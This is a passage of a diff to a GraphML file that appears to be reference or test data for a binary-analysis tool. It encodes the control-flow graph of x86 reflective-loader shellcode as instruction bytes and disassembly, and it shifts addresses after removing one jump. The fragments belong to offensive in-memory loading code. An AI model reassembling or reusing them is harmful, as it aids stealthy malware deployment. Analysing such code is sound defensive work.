+    <edge source="block.0x11ac" target="block.0x11b7"/>
+    <edge source="block.0x11b7" target="block.0x11c1"/>
+    <edge source="block.0x11c1" target="block.0x11c7"/>
+    <edge source="block.0x11c7" target="block.0x11cd"/>
+    <edge source="block.0x11cd" target="block.0x11d3"/>
+    <edge source="block.0x11d3" target="block.0x11d9"/>
+    <edge source="block.0x11d9" target="block.0x11df"/>
+    <edge source="block.0x11df" target="block.0x11e9"/>
+    <edge source="block.0x11e9" target="block.0x1225"/>
+    <edge source="block.0x1225" target="block.0x123a"/>
+    <edge source="block.0x123a" target="block.0x123c"/>
+    <edge source="block.0x123c" target="block.0x124e"/>
+    <edge source="block.0x124e" target="block.0x1254"/>
+    <edge source="block.0x1254" target="block.0x1267"/>
+    <edge source="block.0x1267" target="block.0x1269"/>
+    <edge source="block.0x1269" target="block.0x1271"/>
+    <edge source="block.0x1271" target="block.0x127e"/>
+    <edge source="block.0x127e" target="block.0x1284"/>
+    <edge source="block.0x1284" target="block.0x128e"/>
+    <edge source="block.0x128e" target="block.0x1295"/>
+    <edge source="block.0x1295" target="block.0x12a1"/>
+    <edge source="block.0x12a1" target="block.0x12a4"/>
+    <edge source="block.0x12a4" target="block.0x12b1"/>
+    <edge source="block.0x12b1" target="block.0x12b7"/>
+    <edge source="block.0x12b7" target="block.0x12be"/>
+    <edge source="block.0x12be" target="block.0x12cb"/>
+    <edge source="block.0x12cb" target="block.0x12cf"/>
+    <edge source="block.0x12cf" target="block.0x12db"/>
+    <edge source="block.0x12db" target="block.0x12dd"/>
+    <edge source="block.0x12dd" target="block.0x12e5"/>
+    <edge source="block.0x12e5" target="block.0x12eb"/>
+    <edge source="block.0x12eb" target="block.0x1301"/>
+    <edge source="block.0x1301" target="block.0x130b"/>
+    <edge source="block.0x130b" target="block.0x1311"/>
+    <edge source="block.0x1311" target="block.0x131b"/>
+    <edge source="block.0x131b" target="block.0x132e"/>
+    <edge source="block.0x132e" target="block.0x1334"/>
+    <edge source="block.0x1334" target="block.0x1346"/>
+    <edge source="block.0x1346" target="block.0x1350"/>
+    <edge source="block.0x1350" target="block.0x1358"/>
+    <edge source="block.0x1358" target="block.0x1365"/>
+    <edge source="block.0x1365" target="block.0x1382"/>
+    <edge source="block.0x1382" target="block.0x1388"/>
+    <edge source="block.0x1388" target="block.0x1392"/>
+    <edge source="block.0x1392" target="block.0x13a0"/>
+    <edge source="block.0x13a0" target="block.0x13a7"/>
+    <edge source="block.0x13a7" target="block.0x13dc"/>
+    <edge source="block.0x13dc" target="block.0x13df"/>
+    <edge source="block.0x13df" target="block.0x13e8"/>
+    <edge source="block.0x13e8" target="block.0x1402"/>
+    <edge source="block.0x1402" target="block.0x140c"/>
+    <edge source="block.0x140c" target="block.0x1416"/>
+    <edge source="block.0x1416" target="block.0x141e"/>
+    <edge source="block.0x141e" target="block.0x1445"/>
+    <edge source="block.0x1445" target="block.0x144a"/>
+    <edge source="block.0x144a" target="block.0x1451"/>
+    <edge source="block.0x1451" target="block.0x1459"/>
+    <edge source="block.0x1459" target="block.0x145a"/>
+    <edge source="block.0x145a" target="block.0x145f"/>
+  </graph>
+</graphml>

--- a/data/shellcode/reflective_loader.x86.graphml
+++ b/data/shellcode/reflective_loader.x86.graphml
@@ -558,8 +558,8 @@
         <node id="block.0x10ae:instruction.0x10b7">
           <data key="address">0x10b7</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e862030000</data>
-          <data key="instruction.source">call 0x141e</data>
+          <data key="instruction.hex">e860030000</data>
+          <data key="instruction.source">call 0x141c</data>
         </node>
         <edge source="block.0x10ae:instruction.0x10ae" target="block.0x10ae:instruction.0x10b1"/>
         <edge source="block.0x10ae:instruction.0x10ae" target="block.0x10ae:instruction.0x10b7"/>
@@ -648,8 +648,8 @@
         <node id="block.0x10ce:instruction.0x10da">
           <data key="address">0x10da</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e866030000</data>
-          <data key="instruction.source">call 0x1445</data>
+          <data key="instruction.hex">e864030000</data>
+          <data key="instruction.source">call 0x1443</data>
         </node>
         <edge source="block.0x10ce:instruction.0x10ce" target="block.0x10ce:instruction.0x10cf"/>
         <edge source="block.0x10ce:instruction.0x10ce" target="block.0x10ce:instruction.0x10d7"/>
@@ -937,8 +937,8 @@
         <node id="block.0x1132:instruction.0x113b">
           <data key="address">0x113b</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8de020000</data>
-          <data key="instruction.source">call 0x141e</data>
+          <data key="instruction.hex">e8dc020000</data>
+          <data key="instruction.source">call 0x141c</data>
         </node>
         <edge source="block.0x1132:instruction.0x1132" target="block.0x1132:instruction.0x1135"/>
         <edge source="block.0x1132:instruction.0x1132" target="block.0x1132:instruction.0x113b"/>
@@ -1027,8 +1027,8 @@
         <node id="block.0x114e:instruction.0x115a">
           <data key="address">0x115a</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8e6020000</data>
-          <data key="instruction.source">call 0x1445</data>
+          <data key="instruction.hex">e8e4020000</data>
+          <data key="instruction.source">call 0x1443</data>
         </node>
         <edge source="block.0x114e:instruction.0x114e" target="block.0x114e:instruction.0x114f"/>
         <edge source="block.0x114e:instruction.0x114e" target="block.0x114e:instruction.0x1157"/>
@@ -1602,8 +1602,8 @@
         <node id="block.0x11e9:instruction.0x1220">
           <data key="address">0x1220</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8f1010000</data>
-          <data key="instruction.source">call 0x1416</data>
+          <data key="instruction.hex">e8ef010000</data>
+          <data key="instruction.source">call 0x1414</data>
         </node>
         <edge source="block.0x11e9:instruction.0x11e9" target="block.0x11e9:instruction.0x11ec"/>
         <edge source="block.0x11e9:instruction.0x11e9" target="block.0x11e9:instruction.0x11ef"/>
@@ -2787,8 +2787,8 @@
         <node id="block.0x1382:instruction.0x1386">
           <data key="address">0x1386</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">7460</data>
-          <data key="instruction.source">je 0x13e8</data>
+          <data key="instruction.hex">745e</data>
+          <data key="instruction.source">je 0x13e6</data>
         </node>
         <edge source="block.0x1382:instruction.0x1382" target="block.0x1382:instruction.0x1386"/>
       </graph>
@@ -2820,8 +2820,8 @@
         <node id="block.0x1388:instruction.0x1390">
           <data key="address">0x1390</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">744d</data>
-          <data key="instruction.source">je 0x13df</data>
+          <data key="instruction.hex">744b</data>
+          <data key="instruction.source">je 0x13dd</data>
         </node>
         <edge source="block.0x1388:instruction.0x1388" target="block.0x1388:instruction.0x138b"/>
         <edge source="block.0x1388:instruction.0x138b" target="block.0x1388:instruction.0x138e"/>
@@ -2855,8 +2855,8 @@
         <node id="block.0x1392:instruction.0x139b">
           <data key="address">0x139b</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e9ba000000</data>
-          <data key="instruction.source">jmp 0x145a</data>
+          <data key="instruction.hex">e9b8000000</data>
+          <data key="instruction.source">jmp 0x1458</data>
         </node>
         <edge source="block.0x1392:instruction.0x1392" target="block.0x1392:instruction.0x1395"/>
         <edge source="block.0x1392:instruction.0x1395" target="block.0x1392:instruction.0x1398"/>
@@ -2884,633 +2884,624 @@
         <node id="block.0x13a0:instruction.0x13a5">
           <data key="address">0x13a5</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">eb00</data>
-          <data key="instruction.source">jmp 0x13a7</data>
-        </node>
-        <edge source="block.0x13a0:instruction.0x13a0" target="block.0x13a0:instruction.0x13a1"/>
-      </graph>
-    </node>
-    <node id="block.0x13a7">
-      <data key="address">0x13a7</data>
-      <data key="type">instructions-graph</data>
-      <graph edgedefault="directed">
-        <data key="address">0x13a7</data>
-        <data key="type">instructions</data>
-        <node id="block.0x13a7:instruction.0x13a7">
-          <data key="address">0x13a7</data>
-          <data key="type">instruction</data>
           <data key="instruction.hex">83ec0c</data>
           <data key="instruction.source">sub esp, 0xc</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13aa">
-          <data key="address">0x13aa</data>
+        <node id="block.0x13a0:instruction.0x13a8">
+          <data key="address">0x13a8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b430c</data>
           <data key="instruction.source">mov eax, dword ptr [ebx + 0xc]</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13ad">
-          <data key="address">0x13ad</data>
+        <node id="block.0x13a0:instruction.0x13ab">
+          <data key="address">0x13ab</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0345e8</data>
           <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13b0">
-          <data key="address">0x13b0</data>
+        <node id="block.0x13a0:instruction.0x13ae">
+          <data key="address">0x13ae</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">890424</data>
           <data key="instruction.source">mov dword ptr [esp], eax</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13b3">
-          <data key="address">0x13b3</data>
+        <node id="block.0x13a0:instruction.0x13b1">
+          <data key="address">0x13b1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4308</data>
           <data key="instruction.source">mov eax, dword ptr [ebx + 8]</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13b6">
-          <data key="address">0x13b6</data>
+        <node id="block.0x13a0:instruction.0x13b4">
+          <data key="address">0x13b4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">89442404</data>
           <data key="instruction.source">mov dword ptr [esp + 4], eax</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13ba">
-          <data key="address">0x13ba</data>
+        <node id="block.0x13a0:instruction.0x13b8">
+          <data key="address">0x13b8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c744240800000000</data>
           <data key="instruction.source">mov dword ptr [esp + 8], 0</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13c2">
-          <data key="address">0x13c2</data>
+        <node id="block.0x13a0:instruction.0x13c0">
+          <data key="address">0x13c0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8d442408</data>
           <data key="instruction.source">lea eax, [esp + 8]</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13c6">
-          <data key="address">0x13c6</data>
+        <node id="block.0x13a0:instruction.0x13c4">
+          <data key="address">0x13c4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">50</data>
           <data key="instruction.source">push eax</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13c7">
-          <data key="address">0x13c7</data>
+        <node id="block.0x13a0:instruction.0x13c5">
+          <data key="address">0x13c5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">56</data>
           <data key="instruction.source">push esi</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13c8">
-          <data key="address">0x13c8</data>
+        <node id="block.0x13a0:instruction.0x13c6">
+          <data key="address">0x13c6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8d44240c</data>
           <data key="instruction.source">lea eax, [esp + 0xc]</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13cc">
-          <data key="address">0x13cc</data>
+        <node id="block.0x13a0:instruction.0x13ca">
+          <data key="address">0x13ca</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">50</data>
           <data key="instruction.source">push eax</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13cd">
-          <data key="address">0x13cd</data>
+        <node id="block.0x13a0:instruction.0x13cb">
+          <data key="address">0x13cb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8d44240c</data>
           <data key="instruction.source">lea eax, [esp + 0xc]</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13d1">
-          <data key="address">0x13d1</data>
+        <node id="block.0x13a0:instruction.0x13cf">
+          <data key="address">0x13cf</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">50</data>
           <data key="instruction.source">push eax</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13d2">
-          <data key="address">0x13d2</data>
+        <node id="block.0x13a0:instruction.0x13d0">
+          <data key="address">0x13d0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">6aff</data>
           <data key="instruction.source">push -1</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13d4">
-          <data key="address">0x13d4</data>
+        <node id="block.0x13a0:instruction.0x13d2">
+          <data key="address">0x13d2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b55b4</data>
           <data key="instruction.source">mov edx, dword ptr [ebp - 0x4c]</data>
         </node>
-        <node id="block.0x13a7:instruction.0x13d7">
-          <data key="address">0x13d7</data>
+        <node id="block.0x13a0:instruction.0x13d5">
+          <data key="address">0x13d5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e83a000000</data>
-          <data key="instruction.source">call 0x1416</data>
+          <data key="instruction.source">call 0x1414</data>
         </node>
-        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13ad"/>
-        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13b0"/>
-        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13b6"/>
-        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13ba"/>
-        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13c2"/>
-        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13c6"/>
-        <edge source="block.0x13a7:instruction.0x13aa" target="block.0x13a7:instruction.0x13ad"/>
-        <edge source="block.0x13a7:instruction.0x13aa" target="block.0x13a7:instruction.0x13b0"/>
-        <edge source="block.0x13a7:instruction.0x13ad" target="block.0x13a7:instruction.0x13b0"/>
-        <edge source="block.0x13a7:instruction.0x13ad" target="block.0x13a7:instruction.0x13b3"/>
-        <edge source="block.0x13a7:instruction.0x13b0" target="block.0x13a7:instruction.0x13b3"/>
-        <edge source="block.0x13a7:instruction.0x13b0" target="block.0x13a7:instruction.0x13c6"/>
-        <edge source="block.0x13a7:instruction.0x13b3" target="block.0x13a7:instruction.0x13b6"/>
-        <edge source="block.0x13a7:instruction.0x13b3" target="block.0x13a7:instruction.0x13c2"/>
-        <edge source="block.0x13a7:instruction.0x13b6" target="block.0x13a7:instruction.0x13c2"/>
-        <edge source="block.0x13a7:instruction.0x13b6" target="block.0x13a7:instruction.0x13c6"/>
-        <edge source="block.0x13a7:instruction.0x13ba" target="block.0x13a7:instruction.0x13c6"/>
-        <edge source="block.0x13a7:instruction.0x13c2" target="block.0x13a7:instruction.0x13c6"/>
-        <edge source="block.0x13a7:instruction.0x13c2" target="block.0x13a7:instruction.0x13c8"/>
-        <edge source="block.0x13a7:instruction.0x13c6" target="block.0x13a7:instruction.0x13c7"/>
-        <edge source="block.0x13a7:instruction.0x13c6" target="block.0x13a7:instruction.0x13c8"/>
-        <edge source="block.0x13a7:instruction.0x13c7" target="block.0x13a7:instruction.0x13c8"/>
-        <edge source="block.0x13a7:instruction.0x13c7" target="block.0x13a7:instruction.0x13cc"/>
-        <edge source="block.0x13a7:instruction.0x13c8" target="block.0x13a7:instruction.0x13cc"/>
-        <edge source="block.0x13a7:instruction.0x13c8" target="block.0x13a7:instruction.0x13cd"/>
-        <edge source="block.0x13a7:instruction.0x13cc" target="block.0x13a7:instruction.0x13cd"/>
-        <edge source="block.0x13a7:instruction.0x13cc" target="block.0x13a7:instruction.0x13d1"/>
-        <edge source="block.0x13a7:instruction.0x13cd" target="block.0x13a7:instruction.0x13d1"/>
-        <edge source="block.0x13a7:instruction.0x13d1" target="block.0x13a7:instruction.0x13d2"/>
-        <edge source="block.0x13a7:instruction.0x13d2" target="block.0x13a7:instruction.0x13d4"/>
-        <edge source="block.0x13a7:instruction.0x13d2" target="block.0x13a7:instruction.0x13d7"/>
-        <edge source="block.0x13a7:instruction.0x13d4" target="block.0x13a7:instruction.0x13d7"/>
+        <edge source="block.0x13a0:instruction.0x13a0" target="block.0x13a0:instruction.0x13a1"/>
+        <edge source="block.0x13a0:instruction.0x13a0" target="block.0x13a0:instruction.0x13a5"/>
+        <edge source="block.0x13a0:instruction.0x13a0" target="block.0x13a0:instruction.0x13ae"/>
+        <edge source="block.0x13a0:instruction.0x13a1" target="block.0x13a0:instruction.0x13a8"/>
+        <edge source="block.0x13a0:instruction.0x13a1" target="block.0x13a0:instruction.0x13ae"/>
+        <edge source="block.0x13a0:instruction.0x13a1" target="block.0x13a0:instruction.0x13c5"/>
+        <edge source="block.0x13a0:instruction.0x13a5" target="block.0x13a0:instruction.0x13ab"/>
+        <edge source="block.0x13a0:instruction.0x13a5" target="block.0x13a0:instruction.0x13ae"/>
+        <edge source="block.0x13a0:instruction.0x13a5" target="block.0x13a0:instruction.0x13b4"/>
+        <edge source="block.0x13a0:instruction.0x13a5" target="block.0x13a0:instruction.0x13b8"/>
+        <edge source="block.0x13a0:instruction.0x13a5" target="block.0x13a0:instruction.0x13c0"/>
+        <edge source="block.0x13a0:instruction.0x13a5" target="block.0x13a0:instruction.0x13c4"/>
+        <edge source="block.0x13a0:instruction.0x13a8" target="block.0x13a0:instruction.0x13ab"/>
+        <edge source="block.0x13a0:instruction.0x13a8" target="block.0x13a0:instruction.0x13ae"/>
+        <edge source="block.0x13a0:instruction.0x13ab" target="block.0x13a0:instruction.0x13ae"/>
+        <edge source="block.0x13a0:instruction.0x13ab" target="block.0x13a0:instruction.0x13b1"/>
+        <edge source="block.0x13a0:instruction.0x13ae" target="block.0x13a0:instruction.0x13b1"/>
+        <edge source="block.0x13a0:instruction.0x13ae" target="block.0x13a0:instruction.0x13c4"/>
+        <edge source="block.0x13a0:instruction.0x13b1" target="block.0x13a0:instruction.0x13b4"/>
+        <edge source="block.0x13a0:instruction.0x13b1" target="block.0x13a0:instruction.0x13c0"/>
+        <edge source="block.0x13a0:instruction.0x13b4" target="block.0x13a0:instruction.0x13c0"/>
+        <edge source="block.0x13a0:instruction.0x13b4" target="block.0x13a0:instruction.0x13c4"/>
+        <edge source="block.0x13a0:instruction.0x13b8" target="block.0x13a0:instruction.0x13c4"/>
+        <edge source="block.0x13a0:instruction.0x13c0" target="block.0x13a0:instruction.0x13c4"/>
+        <edge source="block.0x13a0:instruction.0x13c0" target="block.0x13a0:instruction.0x13c6"/>
+        <edge source="block.0x13a0:instruction.0x13c4" target="block.0x13a0:instruction.0x13c5"/>
+        <edge source="block.0x13a0:instruction.0x13c4" target="block.0x13a0:instruction.0x13c6"/>
+        <edge source="block.0x13a0:instruction.0x13c5" target="block.0x13a0:instruction.0x13c6"/>
+        <edge source="block.0x13a0:instruction.0x13c5" target="block.0x13a0:instruction.0x13ca"/>
+        <edge source="block.0x13a0:instruction.0x13c6" target="block.0x13a0:instruction.0x13ca"/>
+        <edge source="block.0x13a0:instruction.0x13c6" target="block.0x13a0:instruction.0x13cb"/>
+        <edge source="block.0x13a0:instruction.0x13ca" target="block.0x13a0:instruction.0x13cb"/>
+        <edge source="block.0x13a0:instruction.0x13ca" target="block.0x13a0:instruction.0x13cf"/>
+        <edge source="block.0x13a0:instruction.0x13cb" target="block.0x13a0:instruction.0x13cf"/>
+        <edge source="block.0x13a0:instruction.0x13cf" target="block.0x13a0:instruction.0x13d0"/>
+        <edge source="block.0x13a0:instruction.0x13d0" target="block.0x13a0:instruction.0x13d2"/>
+        <edge source="block.0x13a0:instruction.0x13d0" target="block.0x13a0:instruction.0x13d5"/>
+        <edge source="block.0x13a0:instruction.0x13d2" target="block.0x13a0:instruction.0x13d5"/>
       </graph>
     </node>
-    <node id="block.0x13dc">
-      <data key="address">0x13dc</data>
+    <node id="block.0x13da">
+      <data key="address">0x13da</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13dc</data>
+        <data key="address">0x13da</data>
         <data key="type">instructions</data>
-        <node id="block.0x13dc:instruction.0x13dc">
-          <data key="address">0x13dc</data>
+        <node id="block.0x13da:instruction.0x13da">
+          <data key="address">0x13da</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">83c40c</data>
           <data key="instruction.source">add esp, 0xc</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x13df">
-      <data key="address">0x13df</data>
+    <node id="block.0x13dd">
+      <data key="address">0x13dd</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13df</data>
+        <data key="address">0x13dd</data>
         <data key="type">instructions</data>
-        <node id="block.0x13df:instruction.0x13df">
-          <data key="address">0x13df</data>
+        <node id="block.0x13dd:instruction.0x13dd">
+          <data key="address">0x13dd</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8345c428</data>
           <data key="instruction.source">add dword ptr [ebp - 0x3c], 0x28</data>
         </node>
-        <node id="block.0x13df:instruction.0x13e3">
-          <data key="address">0x13e3</data>
+        <node id="block.0x13dd:instruction.0x13e1">
+          <data key="address">0x13e1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff4dcc</data>
           <data key="instruction.source">dec dword ptr [ebp - 0x34]</data>
         </node>
-        <node id="block.0x13df:instruction.0x13e6">
-          <data key="address">0x13e6</data>
+        <node id="block.0x13dd:instruction.0x13e4">
+          <data key="address">0x13e4</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">eb9a</data>
+          <data key="instruction.hex">eb9c</data>
           <data key="instruction.source">jmp 0x1382</data>
         </node>
-        <edge source="block.0x13df:instruction.0x13df" target="block.0x13df:instruction.0x13e3"/>
-        <edge source="block.0x13df:instruction.0x13e3" target="block.0x13df:instruction.0x13e6"/>
+        <edge source="block.0x13dd:instruction.0x13dd" target="block.0x13dd:instruction.0x13e1"/>
+        <edge source="block.0x13dd:instruction.0x13e1" target="block.0x13dd:instruction.0x13e4"/>
       </graph>
     </node>
-    <node id="block.0x13e8">
-      <data key="address">0x13e8</data>
+    <node id="block.0x13e6">
+      <data key="address">0x13e6</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13e8</data>
+        <data key="address">0x13e6</data>
         <data key="type">instructions</data>
-        <node id="block.0x13e8:instruction.0x13e8">
-          <data key="address">0x13e8</data>
+        <node id="block.0x13e6:instruction.0x13e6">
+          <data key="address">0x13e6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4de8</data>
           <data key="instruction.source">mov ecx, dword ptr [ebp - 0x18]</data>
         </node>
-        <node id="block.0x13e8:instruction.0x13eb">
-          <data key="address">0x13eb</data>
+        <node id="block.0x13e6:instruction.0x13e9">
+          <data key="address">0x13e9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b413c</data>
           <data key="instruction.source">mov eax, dword ptr [ecx + 0x3c]</data>
         </node>
-        <node id="block.0x13e8:instruction.0x13ee">
-          <data key="address">0x13ee</data>
+        <node id="block.0x13e6:instruction.0x13ec">
+          <data key="address">0x13ec</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01c8</data>
           <data key="instruction.source">add eax, ecx</data>
         </node>
-        <node id="block.0x13e8:instruction.0x13f0">
-          <data key="address">0x13f0</data>
+        <node id="block.0x13e6:instruction.0x13ee">
+          <data key="address">0x13ee</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4028</data>
           <data key="instruction.source">mov eax, dword ptr [eax + 0x28]</data>
         </node>
-        <node id="block.0x13e8:instruction.0x13f3">
-          <data key="address">0x13f3</data>
+        <node id="block.0x13e6:instruction.0x13f1">
+          <data key="address">0x13f1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0345e8</data>
           <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
         </node>
-        <node id="block.0x13e8:instruction.0x13f6">
-          <data key="address">0x13f6</data>
+        <node id="block.0x13e6:instruction.0x13f4">
+          <data key="address">0x13f4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8945c4</data>
           <data key="instruction.source">mov dword ptr [ebp - 0x3c], eax</data>
         </node>
-        <node id="block.0x13e8:instruction.0x13f9">
+        <node id="block.0x13e6:instruction.0x13f7">
+          <data key="address">0x13f7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6a00</data>
+          <data key="instruction.source">push 0</data>
+        </node>
+        <node id="block.0x13e6:instruction.0x13f9">
           <data key="address">0x13f9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">6a00</data>
           <data key="instruction.source">push 0</data>
         </node>
-        <node id="block.0x13e8:instruction.0x13fb">
+        <node id="block.0x13e6:instruction.0x13fb">
           <data key="address">0x13fb</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">6a00</data>
-          <data key="instruction.source">push 0</data>
-        </node>
-        <node id="block.0x13e8:instruction.0x13fd">
-          <data key="address">0x13fd</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">6aff</data>
           <data key="instruction.source">push -1</data>
         </node>
-        <node id="block.0x13e8:instruction.0x13ff">
-          <data key="address">0x13ff</data>
+        <node id="block.0x13e6:instruction.0x13fd">
+          <data key="address">0x13fd</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff55f0</data>
           <data key="instruction.source">call dword ptr [ebp - 0x10]</data>
         </node>
-        <edge source="block.0x13e8:instruction.0x13e8" target="block.0x13e8:instruction.0x13eb"/>
-        <edge source="block.0x13e8:instruction.0x13e8" target="block.0x13e8:instruction.0x13ee"/>
-        <edge source="block.0x13e8:instruction.0x13e8" target="block.0x13e8:instruction.0x13f9"/>
-        <edge source="block.0x13e8:instruction.0x13eb" target="block.0x13e8:instruction.0x13ee"/>
-        <edge source="block.0x13e8:instruction.0x13eb" target="block.0x13e8:instruction.0x13f6"/>
-        <edge source="block.0x13e8:instruction.0x13ee" target="block.0x13e8:instruction.0x13f0"/>
-        <edge source="block.0x13e8:instruction.0x13ee" target="block.0x13e8:instruction.0x13f3"/>
-        <edge source="block.0x13e8:instruction.0x13f0" target="block.0x13e8:instruction.0x13f3"/>
-        <edge source="block.0x13e8:instruction.0x13f0" target="block.0x13e8:instruction.0x13f6"/>
-        <edge source="block.0x13e8:instruction.0x13f3" target="block.0x13e8:instruction.0x13f6"/>
-        <edge source="block.0x13e8:instruction.0x13f3" target="block.0x13e8:instruction.0x13f9"/>
-        <edge source="block.0x13e8:instruction.0x13f6" target="block.0x13e8:instruction.0x13f9"/>
-        <edge source="block.0x13e8:instruction.0x13f9" target="block.0x13e8:instruction.0x13fb"/>
-        <edge source="block.0x13e8:instruction.0x13fb" target="block.0x13e8:instruction.0x13fd"/>
-        <edge source="block.0x13e8:instruction.0x13fd" target="block.0x13e8:instruction.0x13ff"/>
+        <edge source="block.0x13e6:instruction.0x13e6" target="block.0x13e6:instruction.0x13e9"/>
+        <edge source="block.0x13e6:instruction.0x13e6" target="block.0x13e6:instruction.0x13ec"/>
+        <edge source="block.0x13e6:instruction.0x13e6" target="block.0x13e6:instruction.0x13f7"/>
+        <edge source="block.0x13e6:instruction.0x13e9" target="block.0x13e6:instruction.0x13ec"/>
+        <edge source="block.0x13e6:instruction.0x13e9" target="block.0x13e6:instruction.0x13f4"/>
+        <edge source="block.0x13e6:instruction.0x13ec" target="block.0x13e6:instruction.0x13ee"/>
+        <edge source="block.0x13e6:instruction.0x13ec" target="block.0x13e6:instruction.0x13f1"/>
+        <edge source="block.0x13e6:instruction.0x13ee" target="block.0x13e6:instruction.0x13f1"/>
+        <edge source="block.0x13e6:instruction.0x13ee" target="block.0x13e6:instruction.0x13f4"/>
+        <edge source="block.0x13e6:instruction.0x13f1" target="block.0x13e6:instruction.0x13f4"/>
+        <edge source="block.0x13e6:instruction.0x13f1" target="block.0x13e6:instruction.0x13f7"/>
+        <edge source="block.0x13e6:instruction.0x13f4" target="block.0x13e6:instruction.0x13f7"/>
+        <edge source="block.0x13e6:instruction.0x13f7" target="block.0x13e6:instruction.0x13f9"/>
+        <edge source="block.0x13e6:instruction.0x13f9" target="block.0x13e6:instruction.0x13fb"/>
+        <edge source="block.0x13e6:instruction.0x13fb" target="block.0x13e6:instruction.0x13fd"/>
       </graph>
     </node>
-    <node id="block.0x1402">
-      <data key="address">0x1402</data>
+    <node id="block.0x1400">
+      <data key="address">0x1400</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1402</data>
+        <data key="address">0x1400</data>
         <data key="type">instructions</data>
-        <node id="block.0x1402:instruction.0x1402">
-          <data key="address">0x1402</data>
+        <node id="block.0x1400:instruction.0x1400">
+          <data key="address">0x1400</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">6a00</data>
           <data key="instruction.source">push 0</data>
         </node>
-        <node id="block.0x1402:instruction.0x1404">
-          <data key="address">0x1404</data>
+        <node id="block.0x1400:instruction.0x1402">
+          <data key="address">0x1402</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">6a01</data>
           <data key="instruction.source">push 1</data>
         </node>
-        <node id="block.0x1402:instruction.0x1406">
-          <data key="address">0x1406</data>
+        <node id="block.0x1400:instruction.0x1404">
+          <data key="address">0x1404</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff75e8</data>
           <data key="instruction.source">push dword ptr [ebp - 0x18]</data>
         </node>
-        <node id="block.0x1402:instruction.0x1409">
-          <data key="address">0x1409</data>
+        <node id="block.0x1400:instruction.0x1407">
+          <data key="address">0x1407</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff55c4</data>
           <data key="instruction.source">call dword ptr [ebp - 0x3c]</data>
         </node>
-        <edge source="block.0x1402:instruction.0x1402" target="block.0x1402:instruction.0x1404"/>
-        <edge source="block.0x1402:instruction.0x1404" target="block.0x1402:instruction.0x1406"/>
-        <edge source="block.0x1402:instruction.0x1406" target="block.0x1402:instruction.0x1409"/>
+        <edge source="block.0x1400:instruction.0x1400" target="block.0x1400:instruction.0x1402"/>
+        <edge source="block.0x1400:instruction.0x1402" target="block.0x1400:instruction.0x1404"/>
+        <edge source="block.0x1400:instruction.0x1404" target="block.0x1400:instruction.0x1407"/>
       </graph>
     </node>
